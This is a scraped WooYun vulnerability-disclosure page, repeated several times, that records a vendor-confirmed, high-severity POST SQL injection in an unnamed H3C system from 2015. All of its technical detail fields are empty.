经查该漏洞确实存在，已经知会相关人员处理。感谢您对H3C的关注，以及对H3C信息安全辛苦的付出！
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096781

漏洞标题：华三某系统存在POST注入问题

相关厂商：华三通信

漏洞作者：路人甲

提交时间：2015-02-14 10:12

修复时间：2015-03-31 10:14

公开时间：2015-03-31 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096781

漏洞标题：华三某系统存在POST注入问题

相关厂商：华三通信

漏洞作者： 路人甲

提交时间：2015-02-14 10:12

修复时间：2015-03-31 10:14

公开时间：2015-03-31 10:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-096781"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云
